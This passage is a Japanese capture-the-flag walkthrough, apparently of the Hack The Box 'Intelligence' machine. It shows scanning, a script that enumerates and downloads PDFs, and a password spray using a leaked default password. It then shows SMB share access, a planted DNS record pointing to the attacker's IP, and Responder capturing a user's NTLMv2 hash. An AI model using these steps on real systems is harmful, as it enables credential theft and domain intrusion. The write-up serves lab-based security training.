目次
偵察
nmapでスキャンします。
PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 |_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Intelligence 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-02-15 12:10:01Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88 | SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7 | SHA-256: 9131 08b8 dcbf 87da 770b 4067 4fbd 2b93 e5c5 3d00 1240 09b2 84e5 c49f 3886 867d | -----BEGIN CERTIFICATE----- | MIIF+zCCBOOgAwIBAgITcQAAAALMnIRQzlB+HAAAAAAAAjANBgkqhkiG9w0BAQsF | ADBQMRMwEQYKCZImiZPyLGQBGRYDaHRiMRwwGgYKCZImiZPyLGQBGRYMaW50ZWxs | aWdlbmNlMRswGQYDVQQDExJpbnRlbGxpZ2VuY2UtREMtQ0EwHhcNMjEwNDE5MDA0 | MzE2WhcNMjIwNDE5MDA0MzE2WjAeMRwwGgYDVQQDExNkYy5pbnRlbGxpZ2VuY2Uu | aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwCX8Wz5Z7/hs1L9f | F3QgoOIpTaMp7gi+vxcj8ICORH+ujWj+tNbuU0JZNsviRPyB9bRxkx7dIT8kF8+8 | u+ED4K38l8ucL9cv14jh1xrf9cfPd/CQAd6+AO6qX9olVNnLwExSdkz/ysJ0F5FU | xk+l60z1ncIfkGVxRsXSqaPyimMaq1E8GvHT70hNc6RwhyDUIYXS6TgKEJ5wwyPs | s0VFlsvZ19fOUyKyq9XdyziyKB4wYIiVyptRDvst1rJS6mt6LaANomy5x3ZXxTf7 | RQOJaiUA9fjiV4TTVauiAf9Vt0DSgCPFoRL2oPbvrN4WUluv/PrVpNBeuN3Akks6 | cmxzKQIDAQABo4IC/jCCAvowLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD | AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD | ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC | AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ | YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNV | HQ4EFgQUCA00YNMscsMLHdNQNIASzc940RUwHwYDVR0jBBgwFoAUo2aX3GwKIqdG | sKQv+8oXL8nKl8swgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6Ly8vQ049 | aW50ZWxsaWdlbmNlLURDLUNBLENOPWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl | MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWludGVs | bGlnZW5jZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29i | amVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHJBggrBgEFBQcBAQSBvDCB | uTCBtgYIKwYBBQUHMAKGgalsZGFwOi8vL0NOPWludGVsbGlnZW5jZS1EQy1DQSxD | Tj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049 | Q29uZmlndXJhdGlvbixEQz1pbnRlbGxpZ2VuY2UsREM9aHRiP2NBQ2VydGlmaWNh | dGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MD8GA1Ud | EQQ4MDagHwYJKwYBBAGCNxkBoBIEEIHijfJ5/cVAp3sSUrgFUO2CE2RjLmludGVs | bGlnZW5jZS5odGIwDQYJKoZIhvcNAQELBQADggEBAAe43GWMvptRljuuQyFyo+AG | c/CL8gNCVGvmkRfXyqK+vb2DBWTQ6uUjl+8hA3WuROBFUkwea5gOByKZdTPQrdou | mVEeAf96bVQ+7/03O3Sz+0jCVTUbAJGnXNnMLStfx6TiMBqfDqsCcWRf2yScX9J4 | 1ilJEh2sEXnps/RYH+N/j7QojPZDvUeM7ZMefR5IFAcnYNZb6TfAPnnpNgdhgsYN | 2urpaMc2At5qjf6pwyKYLxjBit1jcX6TmEgB/uaE/L9Py2mqyC7p1r40V1FxSGbE | z4fcj1sme6//eFq7SKNiYe5dEh4SZPB/5wkztD1yt5A6AWaM+naj/0d8K0tcxSY= |_-----END CERTIFICATE----- |_ssl-date: 2026-02-15T12:11:36+00:00; +7h00m00s from scanner time. 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88 | SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7 | SHA-256: 9131 08b8 dcbf 87da 770b 4067 4fbd 2b93 e5c5 3d00 1240 09b2 84e5 c49f 3886 867d | -----BEGIN CERTIFICATE----- | MIIF+zCCBOOgAwIBAgITcQAAAALMnIRQzlB+HAAAAAAAAjANBgkqhkiG9w0BAQsF | ADBQMRMwEQYKCZImiZPyLGQBGRYDaHRiMRwwGgYKCZImiZPyLGQBGRYMaW50ZWxs | aWdlbmNlMRswGQYDVQQDExJpbnRlbGxpZ2VuY2UtREMtQ0EwHhcNMjEwNDE5MDA0 | MzE2WhcNMjIwNDE5MDA0MzE2WjAeMRwwGgYDVQQDExNkYy5pbnRlbGxpZ2VuY2Uu | aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwCX8Wz5Z7/hs1L9f | F3QgoOIpTaMp7gi+vxcj8ICORH+ujWj+tNbuU0JZNsviRPyB9bRxkx7dIT8kF8+8 | u+ED4K38l8ucL9cv14jh1xrf9cfPd/CQAd6+AO6qX9olVNnLwExSdkz/ysJ0F5FU | xk+l60z1ncIfkGVxRsXSqaPyimMaq1E8GvHT70hNc6RwhyDUIYXS6TgKEJ5wwyPs | s0VFlsvZ19fOUyKyq9XdyziyKB4wYIiVyptRDvst1rJS6mt6LaANomy5x3ZXxTf7 | RQOJaiUA9fjiV4TTVauiAf9Vt0DSgCPFoRL2oPbvrN4WUluv/PrVpNBeuN3Akks6 | cmxzKQIDAQABo4IC/jCCAvowLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD | AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD | ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC | AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ | YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNV | HQ4EFgQUCA00YNMscsMLHdNQNIASzc940RUwHwYDVR0jBBgwFoAUo2aX3GwKIqdG | sKQv+8oXL8nKl8swgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6Ly8vQ049 | aW50ZWxsaWdlbmNlLURDLUNBLENOPWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl | MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWludGVs | bGlnZW5jZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29i | amVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHJBggrBgEFBQcBAQSBvDCB | uTCBtgYIKwYBBQUHMAKGgalsZGFwOi8vL0NOPWludGVsbGlnZW5jZS1EQy1DQSxD | Tj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049 | Q29uZmlndXJhdGlvbixEQz1pbnRlbGxpZ2VuY2UsREM9aHRiP2NBQ2VydGlmaWNh | dGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MD8GA1Ud | EQQ4MDagHwYJKwYBBAGCNxkBoBIEEIHijfJ5/cVAp3sSUrgFUO2CE2RjLmludGVs | bGlnZW5jZS5odGIwDQYJKoZIhvcNAQELBQADggEBAAe43GWMvptRljuuQyFyo+AG | c/CL8gNCVGvmkRfXyqK+vb2DBWTQ6uUjl+8hA3WuROBFUkwea5gOByKZdTPQrdou | mVEeAf96bVQ+7/03O3Sz+0jCVTUbAJGnXNnMLStfx6TiMBqfDqsCcWRf2yScX9J4 | 1ilJEh2sEXnps/RYH+N/j7QojPZDvUeM7ZMefR5IFAcnYNZb6TfAPnnpNgdhgsYN | 2urpaMc2At5qjf6pwyKYLxjBit1jcX6TmEgB/uaE/L9Py2mqyC7p1r40V1FxSGbE | z4fcj1sme6//eFq7SKNiYe5dEh4SZPB/5wkztD1yt5A6AWaM+naj/0d8K0tcxSY= |_-----END CERTIFICATE----- |_ssl-date: 2026-02-15T12:11:36+00:00; +7h00m00s from scanner time. 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-02-15T12:11:36+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88 | SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7 | SHA-256: 9131 08b8 dcbf 87da 770b 4067 4fbd 2b93 e5c5 3d00 1240 09b2 84e5 c49f 3886 867d | -----BEGIN CERTIFICATE----- | MIIF+zCCBOOgAwIBAgITcQAAAALMnIRQzlB+HAAAAAAAAjANBgkqhkiG9w0BAQsF | ADBQMRMwEQYKCZImiZPyLGQBGRYDaHRiMRwwGgYKCZImiZPyLGQBGRYMaW50ZWxs | aWdlbmNlMRswGQYDVQQDExJpbnRlbGxpZ2VuY2UtREMtQ0EwHhcNMjEwNDE5MDA0 | MzE2WhcNMjIwNDE5MDA0MzE2WjAeMRwwGgYDVQQDExNkYy5pbnRlbGxpZ2VuY2Uu | aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwCX8Wz5Z7/hs1L9f | F3QgoOIpTaMp7gi+vxcj8ICORH+ujWj+tNbuU0JZNsviRPyB9bRxkx7dIT8kF8+8 | u+ED4K38l8ucL9cv14jh1xrf9cfPd/CQAd6+AO6qX9olVNnLwExSdkz/ysJ0F5FU | xk+l60z1ncIfkGVxRsXSqaPyimMaq1E8GvHT70hNc6RwhyDUIYXS6TgKEJ5wwyPs | s0VFlsvZ19fOUyKyq9XdyziyKB4wYIiVyptRDvst1rJS6mt6LaANomy5x3ZXxTf7 | RQOJaiUA9fjiV4TTVauiAf9Vt0DSgCPFoRL2oPbvrN4WUluv/PrVpNBeuN3Akks6 | cmxzKQIDAQABo4IC/jCCAvowLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD | AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD | ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC | AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ | YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNV | HQ4EFgQUCA00YNMscsMLHdNQNIASzc940RUwHwYDVR0jBBgwFoAUo2aX3GwKIqdG | sKQv+8oXL8nKl8swgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6Ly8vQ049 | aW50ZWxsaWdlbmNlLURDLUNBLENOPWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl | MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWludGVs | bGlnZW5jZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29i | amVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHJBggrBgEFBQcBAQSBvDCB | uTCBtgYIKwYBBQUHMAKGgalsZGFwOi8vL0NOPWludGVsbGlnZW5jZS1EQy1DQSxD | Tj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049 | Q29uZmlndXJhdGlvbixEQz1pbnRlbGxpZ2VuY2UsREM9aHRiP2NBQ2VydGlmaWNh | dGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MD8GA1Ud | EQQ4MDagHwYJKwYBBAGCNxkBoBIEEIHijfJ5/cVAp3sSUrgFUO2CE2RjLmludGVs | bGlnZW5jZS5odGIwDQYJKoZIhvcNAQELBQADggEBAAe43GWMvptRljuuQyFyo+AG | c/CL8gNCVGvmkRfXyqK+vb2DBWTQ6uUjl+8hA3WuROBFUkwea5gOByKZdTPQrdou | mVEeAf96bVQ+7/03O3Sz+0jCVTUbAJGnXNnMLStfx6TiMBqfDqsCcWRf2yScX9J4 | 1ilJEh2sEXnps/RYH+N/j7QojPZDvUeM7ZMefR5IFAcnYNZb6TfAPnnpNgdhgsYN | 2urpaMc2At5qjf6pwyKYLxjBit1jcX6TmEgB/uaE/L9Py2mqyC7p1r40V1FxSGbE | z4fcj1sme6//eFq7SKNiYe5dEh4SZPB/5wkztD1yt5A6AWaM+naj/0d8K0tcxSY= |_-----END CERTIFICATE----- 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88 | SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7 | SHA-256: 9131 08b8 dcbf 87da 770b 4067 4fbd 2b93 e5c5 3d00 1240 09b2 84e5 c49f 3886 867d | -----BEGIN CERTIFICATE----- | MIIF+zCCBOOgAwIBAgITcQAAAALMnIRQzlB+HAAAAAAAAjANBgkqhkiG9w0BAQsF | ADBQMRMwEQYKCZImiZPyLGQBGRYDaHRiMRwwGgYKCZImiZPyLGQBGRYMaW50ZWxs | aWdlbmNlMRswGQYDVQQDExJpbnRlbGxpZ2VuY2UtREMtQ0EwHhcNMjEwNDE5MDA0 | MzE2WhcNMjIwNDE5MDA0MzE2WjAeMRwwGgYDVQQDExNkYy5pbnRlbGxpZ2VuY2Uu | aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwCX8Wz5Z7/hs1L9f | F3QgoOIpTaMp7gi+vxcj8ICORH+ujWj+tNbuU0JZNsviRPyB9bRxkx7dIT8kF8+8 | u+ED4K38l8ucL9cv14jh1xrf9cfPd/CQAd6+AO6qX9olVNnLwExSdkz/ysJ0F5FU | xk+l60z1ncIfkGVxRsXSqaPyimMaq1E8GvHT70hNc6RwhyDUIYXS6TgKEJ5wwyPs | s0VFlsvZ19fOUyKyq9XdyziyKB4wYIiVyptRDvst1rJS6mt6LaANomy5x3ZXxTf7 | RQOJaiUA9fjiV4TTVauiAf9Vt0DSgCPFoRL2oPbvrN4WUluv/PrVpNBeuN3Akks6 | cmxzKQIDAQABo4IC/jCCAvowLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD | AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD | ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC | AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ | YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNV | HQ4EFgQUCA00YNMscsMLHdNQNIASzc940RUwHwYDVR0jBBgwFoAUo2aX3GwKIqdG | sKQv+8oXL8nKl8swgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6Ly8vQ049 | aW50ZWxsaWdlbmNlLURDLUNBLENOPWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl | MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWludGVs | bGlnZW5jZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29i | amVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHJBggrBgEFBQcBAQSBvDCB | uTCBtgYIKwYBBQUHMAKGgalsZGFwOi8vL0NOPWludGVsbGlnZW5jZS1EQy1DQSxD | Tj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049 | Q29uZmlndXJhdGlvbixEQz1pbnRlbGxpZ2VuY2UsREM9aHRiP2NBQ2VydGlmaWNh | dGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MD8GA1Ud | EQQ4MDagHwYJKwYBBAGCNxkBoBIEEIHijfJ5/cVAp3sSUrgFUO2CE2RjLmludGVs | bGlnZW5jZS5odGIwDQYJKoZIhvcNAQELBQADggEBAAe43GWMvptRljuuQyFyo+AG | c/CL8gNCVGvmkRfXyqK+vb2DBWTQ6uUjl+8hA3WuROBFUkwea5gOByKZdTPQrdou | mVEeAf96bVQ+7/03O3Sz+0jCVTUbAJGnXNnMLStfx6TiMBqfDqsCcWRf2yScX9J4 | 1ilJEh2sEXnps/RYH+N/j7QojPZDvUeM7ZMefR5IFAcnYNZb6TfAPnnpNgdhgsYN | 2urpaMc2At5qjf6pwyKYLxjBit1jcX6TmEgB/uaE/L9Py2mqyC7p1r40V1FxSGbE | z4fcj1sme6//eFq7SKNiYe5dEh4SZPB/5wkztD1yt5A6AWaM+naj/0d8K0tcxSY= |_-----END CERTIFICATE----- |_ssl-date: 2026-02-15T12:11:36+00:00; +7h00m00s from scanner time. 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49691/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49710/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49713/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
TCP/80の調査
ブラウザでアクセスすると以下のようなページが表示されます。
ReconSpiderでWebサイトのリンクを調査します。
┌──(kali㉿kali)-[~/opt/ReconSpider]
└─$ python3 ReconSpider.py http://intelligence.htb
※結果がresults.jsonに出力される。
┌──(myenv)─(kali㉿kali)-[~/opt/ReconSpider] └─$ cat results.json { "emails": [ "contact@intelligence.htb" ], "links": [ "http://intelligence.htb/documents/2020-12-15-upload.pdf", "http://intelligence.htb/documents/2020-01-01-upload.pdf", "http://intelligence.htb#page-top", "http://intelligence.htb#!", "http://intelligence.htb#signup" ], "external_files": [ "http://intelligence.htb/pdf", "http://intelligence.htb/documents/2020-01-01-upload.pdf", "http://intelligence.htb/documents/2020-12-15-upload.pdf", "http://intelligence.htb/css" ], "js_files": [ "http://intelligence.htb/documents/jquery.min.js", "http://intelligence.htb/documents/bootstrap.bundle.min.js", "http://intelligence.htb/documents/scripts.js", "http://intelligence.htb/documents/jquery.easing.min.js", "http://intelligence.htb/documents/all.js" ], "form_fields": [], "images": [ "http://intelligence.htb/documents/demo-image-02.jpg", "http://intelligence.htb/documents/demo-image-01.jpg" ], "videos": [], "audio": [], "comments": [] }
見つかったPDFはLorem ipsumというダミーテキストです。
PDFは「YYYY-MM-DD-upload.pdf」のパターンで作成されている為、その他のファイルをスクリプトで列挙します。
Pythonスクリプトの例
#!/usr/bin/env python3
import datetime
import requests
import os
# 開始日と終了日
t = datetime.datetime(2020, 1, 1)
end = datetime.datetime(2021, 7, 4)
# 保存先ディレクトリ
save_dir = "downloaded_pdfs"
os.makedirs(save_dir, exist_ok=True)
while t < end:
url = t.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf")
resp = requests.get(url)
if resp.status_code == 200:
print(url)
filename = t.strftime("%Y-%m-%d") + ".pdf"
filepath = os.path.join(save_dir, filename)
with open(filepath, 'wb') as f:
f.write(resp.content)
t += datetime.timedelta(days=1)
上記でダウンロードしたファイルをテキストに変換します。
for file in *.pdf; do pdftotext "$file"; done
テキストファイルにgrepします。
┌──(kali㉿kali)-[~/htb/intelligence/downloaded_pdfs] └─$ grep -iE (pass| pwd | token| secret| api| login| user) *.txt 2020-06-04.txt:Please login using your username and the default password of: 2020-06-04.txt:After logging in please change your password as soon as possible.
「2020-06-04-upload.txt」にデフォルトパスワードが含まれています。
次に有効なユーザー名を収集します。
スクリプトでダウンロードしたPDFファイルよりユーザー名を取得します。
exiftool *.pdf | grep Creator | awk -F ': ' '{ print $2 }'
上記のリストとデフォルトパスワードでcrackmapexecを実行すると有効なアカウントが確認できます。
┌──(kali㉿kali)-[~/htb/intelligence] └─$ crackmapexec smb 10.129.95.154 -u users.txt -p NewIntelligenceCorpUser9876 --continue-on-success ---snip--- SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) SMB 10.129.95.154 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 ---snip---
ユーザーフラグ取得
上記で確認できたアカウント情報をもとにSMBアクセスします。
Tiffany.MolinaのDesktopにuser.txtがあります。
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ smbclient ////10.129.95.154 -U "Tiffany.Molina%NewIntelligenceCorpUser9876"
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ smbclient -L //10.129.95.154 -U Tiffany.Molina
Password for [WORKGROUP\Tiffany.Molina]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ smbclient //10.129.95.154/Users -U Tiffany.Molina
Password for [WORKGROUP\Tiffany.Molina]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Mon Apr 19 10:20:26 2021
.. DR 0 Mon Apr 19 10:20:26 2021
Administrator D 0 Mon Apr 19 09:18:39 2021
All Users DHSrn 0 Sat Sep 15 16:21:46 2018
Default DHR 0 Mon Apr 19 11:17:40 2021
Default User DHSrn 0 Sat Sep 15 16:21:46 2018
desktop.ini AHS 174 Sat Sep 15 16:11:27 2018
Public DR 0 Mon Apr 19 09:18:39 2021
Ted.Graves D 0 Mon Apr 19 10:20:26 2021
Tiffany.Molina D 0 Mon Apr 19 09:51:46 2021
3770367 blocks of size 4096. 1459538 blocks available
smb: \>
横展開
ITのフォルダにはスクリプトがあります。
┌──(kali㉿kali)-[~/htb]
└─$ smbclient //10.129.95.154/IT -U Tiffany.Molina
Password for [WORKGROUP\Tiffany.Molina]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 19 09:50:55 2021
.. D 0 Mon Apr 19 09:50:55 2021
downdetector.ps1 A 1046 Mon Apr 19 09:50:55 2021
3770367 blocks of size 4096. 1461366 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \>
スクリプトの中身は以下の通りです。
┌──(kali㉿kali)-[~/htb/intelligence]
└─$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
このスクリプトは5分間隔でActive DirectoryのDNSに登録されているweb*という名前のホストHTTPリクエストを投げ、ステータスコードを確認するスクリプトです。
ここにdnstoolでkaliを参照するレコードを追加します。
┌──(kali㉿kali)-[~/opt/krbrelayx] └─$ python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record web-test --data 10.10.14.93 --type A intelligence.htb -dns-ip 10.129.95.154 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully
レコード追加後にresponderで待ち受けるとTed.Gravesの認証情報が取得できます。
┌──(kali㉿kali)-[~/opt/krbrelayx]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] You don't have an IPv6 address assigned.
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.93]
Responder IPv6 [::1]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-FI6JFIMJPCB]
Responder Domain Name [BOL6.LOCAL]
Responder DCE-RPC Port [47724]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[!] Error starting UDP server on port 5355, check permissions or other servers running.
[!] Error starting UDP server on port 5353, check permissions or other servers running.
[!] Error starting UDP server on port 5355, check permissions or other servers running.
[!] Error starting UDP server on port 5353, check permissions or other servers running.
[HTTP] NTLMv2 Client : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
